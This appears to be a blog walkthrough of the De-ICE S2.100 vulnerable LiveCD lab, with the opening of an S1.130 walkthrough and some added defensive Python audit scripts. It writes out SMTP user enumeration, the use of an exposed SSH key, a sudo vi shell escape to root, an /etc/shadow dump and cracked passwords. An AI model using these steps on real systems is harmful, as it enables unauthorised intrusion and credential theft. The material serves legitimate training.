I had never done the S2 LiveCD; honestly I didn’t know it existed until I was looking for the download links for the series 1 set. This is basically a clean, up-to-date walkthrough using Kali. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

De-ICE S2.100

Download Link: https://download.vulnhub.com/deice/De-ICE_S2.100_%28de-ice.net-2.100-1.0%29.iso

Scenario: The scenario for this LiveCD is that you have been given an assignment to test a company’s 192.168.2.xxx network to identify any vulnerabilities or exploits. The systems within this network are not critical systems and recent backups have been created and tested, so any damage you might cause is of little concern. The organization has had multiple system administrators manage the network over the last couple of years, and they are unsure of the competency of previous (or current) staff.

Default IP: 192.168.2.100

Flags:
1. Port scan host and create list of open ports
2. Obtain access to file system
3. Perform post exploitation
4. Rummage about in the file system
5. FINAL FLAG: Find salary and Social Security Information for employees

Spoilers and Walkthrough

Using netdiscover to find potential addresses, I found the .100 and .101 addresses active.

root@kali:~# netdiscover

 Currently scanning: 192.168.4.0/16   |   Screen View: Unique Hosts            
                                                                               
 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 300               
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.2.1     00:50:56:c0:00:08      1      60  Unknown vendor              
 192.168.2.2     00:50:56:f0:ee:65      1      60  Unknown vendor              
 192.168.2.100   00:0c:29:1f:c6:f0      1      60  Unknown vendor              
 192.168.2.101   00:0c:29:1f:c6:f0      1      60  Unknown vendor              
 192.168.2.254   00:50:56:fe:3a:17      1      60  Unknown vendor

I’ll start by creating a Metasploit workspace and doing a port scan of the host. The name for the workspace is terrible, since I didn’t know at the time that I would be differentiating between series 1 and 2, but it works.

workspace -a de-ice2-100
workspace de-ice2-100
db_nmap -T5 -p 0-65535 -A 192.168.2.100-101

I have had great success in numerous penetration tests with data in FTP, so I will start there. Personally I like to use the FileZilla GUI; I know that goes against everything that makes pen testing fun, so feel free to use the command line. The anonymous user doesn’t get a directory listing or show any files, so let’s dig into the vsftpd service. Searchsploit is the local version of the Exploit-DB database, with the added benefit of not having to click on the CAPTCHA box.

root@kali:~# searchsploit vsftp
--------------------------------------------- ----------------------------------
 Exploit Title                               |  Path
                                             | (/usr/share/exploitdb/platforms/)
--------------------------------------------- ----------------------------------
vsftpd 2.0.5 - 'CWD' Authenticated Remote Me | linux/dos/5814.pl
vsftpd 2.3.2 - Denial of Service             | linux/dos/16270.c
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31818.sh
vsftpd 2.0.5 - 'deny_file' Option Remote Den | windows/dos/31819.pl
vsftpd 2.3.4 - Backdoor Command Execution (M | unix/remote/17491.rb
--------------------------------------------- ----------------------------------

Nothing specific for that version, and mostly denial-of-service attacks, so for now we can move on. Let’s see what mischief we can get into with the web site. From the website directory we can harvest a list of users and email addresses for use later. In a real-world penetration test this would be the start of a well-orchestrated phishing campaign.

Samuel Pickwick      pickwick@herot.net
Nathaniel Winkle     winkle@herot.net
Augustus Snodgrass   snodgrass@herot.net
Tracy Tupman         tupman@herot.net
Sam Weller           weller@herot.net
Tony Weller          tweller@herot.net
Estella Havisham     havisham@herot.net
Abel Magwitch        magwitch@herot.net
Philip Pirrip        pirrip@herot.net
Nicholas Nickleby    nickleby@herot.net
Ralph Nickleby       rnickleby@herot.net
Newman Noggs         noggs@herot.net
Wackford Squeers     squeers@herot.net
Thomas Pinch         pinch@herot.net
Mark Tapley          tapley@herot.net
Sarah Gamp           gamp@herot.net
Jacob Marley         marley@herot.net
Ebenezer Scrooge     scrooge@herot.net
Bob Cratchit         cratchit@herot.net
Bill Sikes           sikes@herot.net
Jack Dawkins         dawkins@herot.net
Noah Claypole        claypole@herot.net

The .101 website looks like a generic policy site, so let’s dig deeper into both of them. Nikto finds some generic problems with the server but nothing that is immediately exploitable.

nikto -h 192.168.2.100
nikto -h 192.168.2.101
+ OSVDB-3268: /~root/: Directory indexing found.
+ OSVDB-637: /~root/: Allowed to browse root's home directory.

Let’s rummage around in that directory. Nada.

During the Nmap scan we found out that the SMTP server has the VRFY verb enabled, allowing us to determine potential user accounts for a brute force attack. The list is fairly simple: last name only, first name only, and first initial plus last name.

Pickwick
Winkle
Snodgrass
Tupman
Weller
Weller
Havisham
Magwitch
Pirrip
Nickleby
Nickleby
Noggs
Squeers
Pinch
Tapley
Gamp
Marley
Scrooge
Cratchit
Sikes
Dawkins
Claypole
Samuel
Nathaniel
Augustus
Tracy
Sam
Tony
Estella
Abel
Philip
Nicholas
Ralph
Newman
Wackford
Thomas
Mark
Sarah
Jacob
Ebenezer
Bob
Bill
Jack
Noah
spickwick
nwinkle
asnodgrass
ttupman
sweller
tweller
ehavisham
amagwitch
ppirrip
nnickleby
rnickleby
nnoggs
wsqueers
tpinch
mtapley
sgamp
jmarley
escrooge
bcratchit
bsikes
jdawkins
nclaypole

Metasploit has an SMTP enumeration module that we will use.

msf > use auxiliary/scanner/smtp/smtp_enum 
msf auxiliary(smtp_enum) > set USER_FILE /root/Desktop/s2100users.txt
USER_FILE => /root/Desktop/s2100users.txt
msf auxiliary(smtp_enum) > set RHOSTS 192.168.2.100
RHOSTS => 192.168.2.100
msf auxiliary(smtp_enum) > run

[*] 192.168.2.100:25      - 192.168.2.100:25 Banner: 220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Wed, 19 Apr 2017 12:00:02 GMT
[+] 192.168.2.100:25      - 192.168.2.100:25 Users found: Havisham, Magwitch, Pirrip
[*] Scanned 1 of 1 hosts (100% complete)

We now have three verified usernames to start an attack (Havisham, Magwitch, Pirrip). The .101 address had a readable ~root directory, so let’s check for those user directories. Good news: there aren’t any files in these either, but all three exist. What files do we expect to see in a user’s home folder? I made a dump of my home folder to answer this question (some of the items are obviously penetration testing tools). Linux hides folders that start with a ., so let’s dump this into a wordlist and get started.

root@kali:~# ls -a
.              core       .ICEauthority  .nano              Templates
..             Desktop    .install4j     .oracle_jre_usage  Videos
.bash_history  Documents  .java          Pictures           .w3af
.bashrc        Downloads  .john          .profile           .wget-hsts
.bundle        .faraday   .local         Public
.BurpSuite     .gconf     .mozilla       .rnd
.cache         .gnupg     .msf4          .sqlmap
.config        .halberd   Music          .ssh

Module options (auxiliary/scanner/http/dir_scanner):

   Name        Current Setting                Required  Description
   ----        ---------------                --------  -----------
   DICTIONARY  /root/Desktop/webwordlist.txt  no        Path of word dictionary to use
   PATH        /~root                         yes       The path  to identify files
   Proxies                                    no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS      192.168.2.101                  yes       The target address range or CIDR identifier
   RPORT       80                             yes       The target port (TCP)
   SSL         false                          no        Negotiate SSL/TLS for outgoing connections
   THREADS     256                            yes       The number of concurrent threads
   VHOST                                      no        HTTP server virtual host

msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~root/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~root/./ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~magwitch
PATH => /~magwitch
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~magwitch/./ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~magwitch/../ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~havisham
PATH => /~havisham
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~havisham/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~havisham/./ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
msf auxiliary(dir_scanner) > set PATH /~pirrip
PATH => /~pirrip
msf auxiliary(dir_scanner) > run

[*] Detecting error code
[*] Using code '404' as not found for 192.168.2.101
[*] Found http://192.168.2.101:80/~pirrip/../ 404 (192.168.2.101)
[*] Found http://192.168.2.101:80/~pirrip/./ 200 (192.168.2.101)
[*] Found http://192.168.2.101:80/~pirrip/.ssh/ 404 (192.168.2.101)
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

The .ssh/ line above (bold in the original) doesn’t show up for the other three users, yet it returns a 404, which is odd; also /./ returns a 200 code instead of a 404. Let’s take a closer look.

Figure 1 – .SSH Folder

That sure looks like it exists. Let’s take a quick detour into SSH to explain why this is important. SSH allows password-based authentication, like we saw in the De-ICE series 1 LiveCDs, but it can also use public key authentication, which relies on a generated public/private key pair. Having the id_rsa file is almost as good as having the password in cleartext. Copy those two files to your local .ssh folder. OpenSSH refuses to use an id_rsa file unless its permissions are set to 600, so set that now; it saves the step of getting the error message, looking up the fix, and trying again.
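The listable ~pirrip/.ssh directory that the web server exposed is exactly what a host audit should have flagged. This is an added Python example, not code from the original post: it walks a home-directory tree, reports .ssh directories readable by other accounts and private keys whose mode is not 0600, and runs itself against a constructed temp-dir sample; the user names come from the post, the key contents are placeholders.

```python
import stat
import tempfile
from pathlib import Path

OTHERS_CAN_READ = stat.S_IRGRP | stat.S_IROTH
OTHERS_CAN_TOUCH = OTHERS_CAN_READ | stat.S_IWGRP | stat.S_IWOTH


def is_private_key(path: Path) -> bool:
    """PEM/OpenSSH private keys start with '-----BEGIN ... PRIVATE KEY-----'."""
    try:
        with path.open("rb") as fh:
            first = fh.readline(200)
    except OSError:
        return False
    return first.startswith(b"-----BEGIN") and b"PRIVATE KEY-----" in first


def audit_homes(home_root: Path):
    """Return (user, name, reason) tuples for .ssh material another account could read.

    A web server runs as its own user, so a .ssh directory readable by 'other'
    is what let UserDir serve /~pirrip/.ssh/ in the dir_scanner output above."""
    findings = []
    for home in sorted(p for p in home_root.iterdir() if p.is_dir()):
        sshdir = home / ".ssh"
        if not sshdir.is_dir():
            continue
        dmode = stat.S_IMODE(sshdir.stat().st_mode)
        if dmode & OTHERS_CAN_READ:
            findings.append((home.name, ".ssh",
                             f"directory mode {dmode:04o}: listable by other users"))
        for f in sorted(sshdir.iterdir()):
            if f.is_file() and is_private_key(f):
                fmode = stat.S_IMODE(f.stat().st_mode)
                if fmode & OTHERS_CAN_TOUCH:
                    findings.append((home.name, f.name,
                                     f"private key mode {fmode:04o}: should be 0600"))
    return findings


def make_sample(root: Path) -> Path:
    """Constructed sample tree: pirrip with a 0755 .ssh and a 0644 id_rsa (the
    situation on the LiveCD) next to havisham, who is locked down. Key bodies
    are placeholders, not real key material."""
    for user, dmode, kmode in (("pirrip", 0o755, 0o644), ("havisham", 0o700, 0o600)):
        sshdir = root / user / ".ssh"
        sshdir.mkdir(parents=True)
        key = sshdir / "id_rsa"
        key.write_bytes(b"-----BEGIN RSA PRIVATE KEY-----\nPLACEHOLDER\n"
                        b"-----END RSA PRIVATE KEY-----\n")
        (sshdir / "id_rsa.pub").write_bytes(b"ssh-rsa PLACEHOLDER " + user.encode() + b"@slax\n")
        key.chmod(kmode)
        sshdir.chmod(dmode)
    return root


def run_demo():
    """Build the sample in a temporary directory, audit it, and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        return audit_homes(make_sample(Path(tmp)))


if __name__ == "__main__":
    for user, name, reason in run_demo():
        print(f"~{user}: {name} -> {reason}")
```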

root@kali:~/Desktop# ssh -i id_rsa pirrip@192.168.2.100
The authenticity of host '192.168.2.100 (192.168.2.100)' can't be established.
RSA key fingerprint is SHA256:Z26/6SkV1lodQR++6+78wD4acFpG2KigCTuwo04+Xlw.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '192.168.2.100' (RSA) to the list of known hosts.
Linux 2.6.16.
pirrip@slax:~$ id
uid=1000(pirrip) gid=10(wheel) groups=10(wheel)
pirrip@slax:~$ su -
Password: ****
Sorry.

We don’t know the password, so even being a member of the wheel group doesn’t help much. There isn’t much to work with in the file system either. In a normal penetration test you could use this system to pivot into others or upload a netcat or Meterpreter shell. In this case, since this is the only system in scope, let’s look at other potential data sources. We know this is a mail server, so:

pirrip@slax:~$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
"/var/mail/pirrip": 7 messages 7 new
>N  1 Abel Magwitch      Sun Jan 13 23:53   20/748   Estella
 N  2 Estella Havisham   Sun Jan 13 23:53   20/780   welcome to the team
 N  3 Abel Magwitch      Sun Jan 13 23:53   20/875   havisham
 N  4 Estella Havisham   Mon Jan 14 00:05   20/861   next month
 N  5 Abel Magwitch      Mon Jan 14 00:05   20/868   vacation
 N  6 Abel Magwitch      Mon Jan 14 00:05   20/915   vacation
 N  7 noreply@fermion.he Mon Jan 14 00:05   29/983   Fermion Account Login Rem
? 
Message  1:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Will do.

? 
Message  2:
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Thanks!  Glad to be here.

? 
Message  3:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

I set her up with an accountus servers.  I set her password to "changeme" and will swing by tomorrow and make sure she changes her pw.

? 
Message  4:
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

? 
Message  5:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Hey, I'll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

? 
Message  6:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Sure - so far, she's doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

? 
Message  7:
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: R

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Regards,
Fermion Support


E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

From the email exchange we have two potential sets of credentials: havisham:changeme and pirrip:0l1v3rTw1st. Let’s try to get elevated privileges with the pirrip password first, since we are already logged in.

pirrip@slax:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

 #1) Respect the privacy of others.
 #2) Think before you type.
 #3) With great power comes great responsibility.

Password:
User pirrip may run the following commands on this host:
 (root) /usr/bin/more
 (root) /usr/bin/tail
 (root) /usr/bin/vi
 (root) /usr/bin/cat ALL
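The sudo -l output above is the kind of policy a sudoers audit should catch before anyone needs an editor trick. This is an added Python example, not code from the original post: it parses sudoers-style rules, flags commands with a built-in shell escape (vi, more) or unrestricted root file reads (cat ALL, bare tail), and shows a hardened rewrite using the NOEXEC tag and sudoedit; the sudoers lines and the /var/log/maillog and /etc/mail/aliases paths in it are constructed for illustration.

```python
import re
from dataclasses import dataclass

# Editors/pagers with a built-in shell escape: vi ':!cmd', more/less '!cmd'.
SHELL_ESCAPE = {
    "vi": "':!cmd' spawns a root shell",
    "vim": "':!cmd' spawns a root shell",
    "more": "'!cmd' spawns a root shell",
    "less": "'!cmd' spawns a root shell",
}
# Programs that, run as root with no pinned argument, read any file
# (tail and cat have no escape but still hand over /etc/shadow).
READS_ANY_FILE = {"cat", "tail", "head", "more", "less", "vi", "vim"}

# user host=(runas) [TAG:] cmd1, cmd2 ...
RULE_RE = re.compile(
    r"^(?P<user>\S+)\s+(?P<host>\S+)\s*=\s*(?:\((?P<runas>[^)]*)\)\s*)?(?P<cmds>.+)$")
TAG_RE = re.compile(
    r"^(?P<tag>NOPASSWD|PASSWD|NOEXEC|EXEC|SETENV|NOSETENV|MAIL|NOMAIL|"
    r"LOG_INPUT|NOLOG_INPUT|LOG_OUTPUT|NOLOG_OUTPUT|FOLLOW|NOFOLLOW):\s*")
SKIP_PREFIXES = ("Defaults", "User_Alias", "Cmnd_Alias", "Host_Alias", "Runas_Alias")


@dataclass
class Finding:
    user: str
    command: str
    reason: str


def _split_cmds(spec: str):
    """Yield (tags, command) pairs from 'NOEXEC: /usr/bin/tail, /usr/bin/cat ALL'.
    As in sudoers, a tag stays in effect for later commands on the same line."""
    tags = set()
    for part in spec.split(","):
        part = part.strip()
        while (m := TAG_RE.match(part)):
            tags.add(m["tag"])
            part = part[m.end():]
        yield set(tags), part


def audit_sudoers(text: str):
    """Return Findings for rules that hand the user a root shell or root read access."""
    findings = []
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line or line.startswith(SKIP_PREFIXES):
            continue
        m = RULE_RE.match(line)
        if not m:
            continue
        user = m["user"]
        for tags, cmd in _split_cmds(m["cmds"]):
            if not cmd or cmd.startswith("sudoedit"):
                continue  # sudoedit edits a copy as the caller; no root editor runs
            if cmd == "ALL":
                findings.append(Finding(user, cmd, "any command as root"))
                continue
            words = cmd.split()
            prog, args = words[0].rsplit("/", 1)[-1], words[1:]
            # NOEXEC (LD_PRELOAD based, dynamically linked programs) blocks the
            # exec() that ':!' relies on, so the escape is only reported without it.
            if prog in SHELL_ESCAPE and "NOEXEC" not in tags:
                findings.append(Finding(user, cmd, SHELL_ESCAPE[prog]))
            if prog in READS_ANY_FILE and (not args or "ALL" in args
                                           or any("*" in a for a in args)):
                findings.append(Finding(user, cmd,
                                        "no argument restriction: reads any file as root"))
    return findings


# Constructed sudoers line reproducing the policy that 'sudo -l' printed above.
WEAK = "pirrip ALL=(root) /usr/bin/more, /usr/bin/tail, /usr/bin/vi, /usr/bin/cat ALL\n"

# Constructed hardened version (paths are illustrative): NOEXEC stops the program
# from exec'ing a shell, the argument is pinned to one file, and sudoedit
# replaces a root-run editor altogether.
HARDENED = """\
Defaults env_reset
pirrip ALL=(root) NOEXEC: /usr/bin/tail /var/log/maillog
pirrip ALL=(root) sudoedit /etc/mail/aliases
"""

if __name__ == "__main__":
    for label, policy in (("weak", WEAK), ("hardened", HARDENED)):
        print(f"[{label}]")
        for f in audit_sudoers(policy):
            print(f"  {f.user}: {f.command} -> {f.reason}")
```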

vi can be used to get a shell; I learned this in a long, drawn-out penetration test where I got a similar restricted shell through the Shellshock vulnerability. In vi the :! command instructs vi to execute a shell command, so let’s try it.

pirrip@slax:~$ sudo vi

:!/bin/sh
sh-3.1# cat /etc/shadow
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

:q

Use :q to exit vi. Feed the password hashes to John or Hashcat and let it cook! Time passes, seasons change. The wedding dress becomes torn and the feast rots on the table (I had to read Charles Dickens in college).

root        P1ckw1ckP@p3rs
havisham    changeme
pirrip      0l1v3rTw1st
magwitch

pirrip@slax:~$ su -
Password: **************
root@slax:~# ls -a
./   .ICEauthority  .Xresources  .fluxbox/       .fonts.conf  .joerc  .kderc   .mc/       .qt/    Desktop/
../  .Xauthority    .config/     .fonts.cache-1  .icons@      .kde/   .local/  .mplayer/  .save/  Set\ IP\ address
root@slax:~# cd .save
root@slax:~/.save# ls -a
./  ../  great_expectations.zip*

We found the file but how do we get it over to our system to check it out? There are a few possible options.

  1. Build a netcat listener and pipe the file over.
  2. Move the file to the FTP root and copy it across.
  3. Move it to the ~root directory and download it from the website.

Netcat is installed on the server, so that is an option, but I am lazy, so I ran the following commands to copy the file to the website and give read permissions to everyone:

/home/root/.save# cp great_expectations.zip /www/101/home/root/
chmod 744 great_expectations.zip

Figure 2 – Archive on Website

After copying it to the local system, unzip the archive and then untar the file that was inside the zip.

unzip great_expectations.zip
tar -xzf great_expectations.tar

Figure 3 – Archive Contents

The greatest piece of advice that I have received on Linux is how to remember the tar switches: say the following in a thick, cartoonish German accent, ‘Extract Zee Files’, tar -xzf. Will this sound dumb when you do it? Yes. Will you remember it without looking at help? Yes.

The Charles_Dickens_3.jpg and Great_Expectations.pdf are pretty self-explanatory. Let’s look at the Jan08 file with cat.

root@kali:~/Desktop/s2-100/great_expectations# cat Jan08 
From sikes@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <sikes@slax.example.net>
Received: from slax.example.net (localhost [127.0.0.1])
    by slax.example.net (8.13.7/8.13.7) with ESMTP id m0DNlmHb009636
    for <pirrip@slax.example.net>; Sun, 13 Jan 2008 23:47:48 GMT
Received: (from sikes@slax.example.net)
    by slax.example.net (8.13.7/8.13.7/Submit) id m0DNlmDI009635
    for pirrip; Sun, 13 Jan 2008 23:47:48 GMT
From: Bill Sikes <sikes@slax.example.net>
Message-Id: <200801132347.m0DNlmDI009635@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Raises
User-Agent: nail 11.25 7/29/05
MIME-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Transfer-Encoding: 7bit

Here's the data for raises for your team:
Philip Pirrip:  734-67-0424 5.5% $74,224
Abel Magwitch:  816-03-0028 4.0% $53,122
Estella Havisham: 762-93-1073 12% $84,325

That is the data we were looking for. But what about that other .jpg file that won’t show a preview? It won’t open in image software; maybe they are trying to obfuscate the file type by changing the extension? Use the file command in Linux to identify the type.

file 363px-Charles_dickensyoung.jpg 
363px-Charles_dickensyoung.jpg: POSIX tar archive (GNU)

That’s not a JPG at all! Let’s rename the file and take a look inside. Maybe that Jan08 file was a decoy? Nope, it was just a second copy of the original archive, but now you know how to use the file command. This was the best of times and the worst of times. I hope that you learned at least one thing that you will be able to put into practice in the future.
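The file command’s verdict above comes from magic bytes, not from the extension. This is an added Python example, not code from the original post: it reproduces that check by identifying content by signature (JPEG, PDF, zip, gzip, and the ‘ustar’ marker at byte 257 of a tar), reports extension/content mismatches, and lists the members of a constructed in-memory tar that wears the .jpg name from the post.

```python
import io
import tarfile

# (magic bytes, offset, label). "ustar" at byte 257 is the POSIX tar signature
# that made file(1) call the renamed .jpg above a "POSIX tar archive".
MAGICS = [
    (b"\xff\xd8\xff", 0, "JPEG image"),
    (b"%PDF-", 0, "PDF document"),
    (b"PK\x03\x04", 0, "Zip archive"),
    (b"\x1f\x8b", 0, "gzip compressed data"),
    (b"ustar", 257, "POSIX tar archive"),
]
# What each extension claims to be, for the mismatch check.
BY_EXT = {"jpg": "JPEG image", "jpeg": "JPEG image", "pdf": "PDF document",
          "zip": "Zip archive", "gz": "gzip compressed data", "tar": "POSIX tar archive"}


def sniff(data: bytes) -> str:
    """Identify content by magic bytes, ignoring the file name entirely."""
    for magic, offset, label in MAGICS:
        if data[offset:offset + len(magic)] == magic:
            return label
    return "data"


def extension_mismatch(name: str, data: bytes) -> bool:
    """True when the extension claims a known type that the bytes do not have."""
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    claimed = BY_EXT.get(ext)
    return claimed is not None and claimed != sniff(data)


def tar_members(data: bytes) -> list:
    """'Take a look inside': list the member names of an uncompressed tar."""
    with tarfile.open(fileobj=io.BytesIO(data), mode="r:") as tf:
        return tf.getnames()


def build_tar(members: dict) -> bytes:
    """Constructed sample: build an uncompressed POSIX tar in memory."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        for name, content in members.items():
            info = tarfile.TarInfo(name)
            info.size = len(content)
            tf.addfile(info, io.BytesIO(content))
    return buf.getvalue()


# Constructed stand-in for 363px-Charles_dickensyoung.jpg: a tar holding a
# placeholder Jan08 message, wearing a .jpg extension.
DISGUISED_NAME = "363px-Charles_dickensyoung.jpg"
DISGUISED = build_tar({"great_expectations/Jan08": b"Subject: Raises (placeholder)\n"})
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00"  # constructed JPEG/JFIF header

if __name__ == "__main__":
    print(DISGUISED_NAME, "->", sniff(DISGUISED),
          "| extension mismatch:", extension_mismatch(DISGUISED_NAME, DISGUISED))
    print("members:", tar_members(DISGUISED))
```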

While digging through an old external drive I found the De-ICE LiveCDs and walkthrough text files I had put together a few years ago. They are really simple; each one is a link to download the ISO, some non-spoiler information to get started, and spoilers on the off chance that you get stuck on some part of the challenge.

Personally, I learned a lot about post exploitation from some of the challenges in De-ICE. This one was short and sweet, not too many flags to deal with. All of the spoilers are in the walkthrough so as not to ruin the pen testing fun. Have fun and hopefully these are helpful.

De-ICE S1.130

Download Link: http://hackingdojo.com/downloads/iso/De-ICE_S1.130.iso

Default IP: Not so fast buddy, that is one of the flags

Flags:
1. Find default IP for system
2. Obtain access to the file system
3. Final Flag: Obtain the new user accounts bank information

Spoilers and Walkthrough

Port scan the image to get started. At this point I was having everyone do this through the Metasploit console instead of stand-alone.

msfconsole
workspace deice
db_nmap -sS -F -T4 --exclude 192.168.1.128 192.168.1.0/24

You will need to exclude your own IP; 192.168.1.128 is mine. If you are running any other known systems on your network, add them to the exclude list separated by commas.

msf > hosts

Hosts
=====

address        mac                name  os_name  os_flavor  os_sp  purpose  info  comments
-------        ---                ----  -------  ---------  -----  -------  ----  --------
192.168.1.1    00:50:56:c0:00:08        Unknown                    device         
192.168.1.2    00:50:56:e6:1d:4b        Unknown                    device         
192.168.1.20   00:0c:29:a4:37:1e        Unknown                    device         
192.168.1.123  00:0c:29:a4:37:1e  slax  Linux               2.6.X  server

.1 and .2 are the VMware NAT. You can check those, but trust me. .123 is a different De-ICE LiveCD that is included in the same database because I’m lazy. Looks like 192.168.1.20 is the one.

netdiscover is another tool that looks for ARP requests to discover live hosts. While it isn’t integrated into Metasploit, I’ve used it on penetration tests to locate hosts for zero-knowledge internal tests.

netdiscover

 Currently scanning: 192.168.66.0/16   |   Screen View: Unique Hosts                                      

 4 Captured ARP Req/Rep packets, from 4 hosts.   Total size: 240                                          
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor / Hostname      
 -----------------------------------------------------------------------------
 192.168.1.1     00:50:56:c0:00:08      1      60  Unknown vendor                                         
 192.168.1.2     00:50:56:e7:84:3f      1      60  Unknown vendor                                         
 192.168.1.20    00:0c:29:1f:c6:f0      1      60  Unknown vendor                                         
 192.168.1.254   00:50:56:f9:37:34      1      60  Unknown vendor

The -sV and -O combination is the same as -A, but I’ve separated it out just to have this line of text to tell you that. When I originally did these walkthroughs the notes became progressively less detailed, since the small group was getting better each week. Since these are now stand-alone I will add a little more detail, hence the time mismatch.

msf > db_nmap -sV -O -F 192.168.1.20 
[*] Nmap: Starting Nmap 7.40 ( https://nmap.org ) at 2017-04-06 00:08 EDT
[*] Nmap: Nmap scan report for 192.168.1.20
[*] Nmap: Host is up (0.00058s latency).
[*] Nmap: Not shown: 93 filtered ports
[*] Nmap: PORT    STATE  SERVICE VERSION
[*] Nmap: 21/tcp  open   ftp     vsftpd 2.0.4
[*] Nmap: 22/tcp  open   ssh     OpenSSH 4.3 (protocol 1.99)
[*] Nmap: 25/tcp  open   smtp    Sendmail 8.13.7/8.13.7
[*] Nmap: 80/tcp  open   http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
[*] Nmap: 110/tcp open   pop3    Openwall popa3d
[*] Nmap: 143/tcp open   imap    UW imapd 2004.357
[*] Nmap: 443/tcp closed https
[*] Nmap: MAC Address: 00:0C:29:1F:C6:F0 (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Linux 2.6.X
